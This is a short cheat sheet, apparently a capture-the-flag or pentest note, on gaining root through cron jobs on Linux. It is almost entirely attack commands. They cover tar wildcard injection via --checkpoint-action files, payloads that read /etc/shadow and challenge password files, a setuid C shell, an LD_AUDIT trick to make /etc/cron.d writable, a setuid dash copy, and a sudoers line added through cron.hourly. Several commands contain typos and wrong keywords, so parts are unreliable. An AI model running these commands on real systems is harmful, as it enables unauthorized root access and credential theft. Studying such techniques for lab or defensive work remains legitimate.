Crontab

Tar wildcard + root cron

# If a privilegied script is used to backup something or just uses tar * in a folder you have write access
# You can exploit it to gain root access

# Create 3 files in the folder
touch -- "--checkpoint=1"
touch -- “--checkpoint-action=exec=sh\ shell.sh”
touch shell.sh

# Then put your payload in the shell.sh script (#!/bin/sh)
cat /etc/shadow > outfile.txt

Exploiting crontab

# If a script is running with higher privileges
echo "cat /challenge/app-script/ch4/.passwd >/tmp/cracked" > cron.d/go && chmod a+x cron.d/go && sleep 60 && cat /tmp/cracked

# Get user ID
cat /etc/passwd | grep shell4cracked

# C program to get a shell
#include <stdlib.h>
#include <unistd.h>

int main() {
    setresuid(1028, 1028, 1028);
    setresuid(1028, 1028, 1028);  
    system("/bin/bash");
    return 0;
}

# Compile and prepare
gcc -o /tmp/pwned /tmp/._cron/shell.c
chmod +s /tmp/pwned   
chmod a+rwx /tmp/pwned

Writable CRON directory

# In /tmp 
# LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping
# since it won't find the .so, the file from PCPROFILE_OUTPUT will be written as word writeable
# Then insert payload inside to create suid root program in /tmp
printf “***** root cp /bin/dash /tmp/exploit; chmod u+s /tmp/exmploit\n” > /etc/cron.d/exploit
cat /etc/cron.d/exploit
ll
./exploit
whoami
# New crontab
touch /tmp/test
/usr/local/share/sgml/donpcgd /tmp/test /etc/cron.hourly/test
echo -e '#!/bin/bash\necho "eric ALL=(ALL) NOPASSWORD:ALL" >> /etc/sudoers' > /etc/cron.hourly/test
chmod +x /etc/cron.hourly/test
cat /etc/chron.hourly/test